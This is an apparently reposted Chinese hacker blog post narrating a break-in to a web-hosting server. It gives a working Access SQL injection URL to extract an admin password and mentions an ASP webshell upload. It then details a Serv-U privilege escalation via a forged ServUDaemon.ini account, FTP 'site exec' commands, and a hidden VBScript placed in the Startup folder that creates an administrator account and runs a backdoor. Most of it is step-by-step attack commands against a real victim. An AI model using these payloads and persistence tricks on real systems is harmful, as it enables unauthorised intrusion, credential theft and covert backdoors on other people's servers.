前幾天聽一樹說了驚云下載系統(tǒng)的漏洞
問題文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相當于:
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理員密碼
上面有一個文件upfile.htm
手工利用了下動網(wǎng)的upfile.asp漏洞
就成功上傳了個asp木馬
然后那個虛擬主機的c，d盤是NTFS分區(qū)
不能訪問E盤裝著servu，php，webmail，
F盤是虛擬站點
servu安裝目錄可寫～
本來打算替換他servu文件的～但是覺的太麻煩
還容易讓管理員懷疑
想起servu的本地提升來了 在自己計算機上裝了個servu
添加了一個用戶，設置為系統(tǒng)管理員，目錄C:\，具有可執(zhí)行權限
然后去servu安裝目錄里看ServUDaemon.ini
格式是這樣的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向?qū)Мa(chǎn)生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=www|1|0
[USER=www|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated account"
Access1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\|RWAMLCDP
SKEYValues=
－－－－－－－－－－－－－－－－
其中rover用戶就是我添加的那個
在虛擬主機的網(wǎng)頁木馬上打開虛擬機的ServUDaemon.ini
訪照我本地的INI寫進一個用戶進去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
保存～ 用我新建的用戶和密碼連接～
好的，還是連上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //輸入構造的用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄，如果是winxp或者是windows server 2003就應該為windows目錄。
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統(tǒng)的net.exe文件加用戶。
提示沒有權限～郁悶～
但是我們有對C盤的訪問權限了是不～hoho～
把后門（server.exe）傳他system32目錄
然后寫一個VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存為HELP.vbe
這個教本的作用是修改tsinternetuser用戶密碼為rover1234
并且提升為管理員
然后執(zhí)行system32目錄下的server.exe
把這個教本傳他C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
目錄
這樣管理員只要一登陸就會執(zhí)行那個教本～
接下來就是等了～
等他登陸～
等了一段時間（看了一部蜘蛛俠的時間吧）～
連接后門～得到admin權限的shell
hoho～
接下來是善后工作了～就不說了
今天心情非常糟～有一些事情壓的我喘不過氣來
考試的時候當老師面把卷子撕了，然后揚步走了～
媽媽的～過程寫的很亂～見諒

版權聲明：本站文章來源標注為YINGSOO的內(nèi)容版權均為本站所有，歡迎引用、轉載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權，請聯(lián)系alex-e#qq.com處理。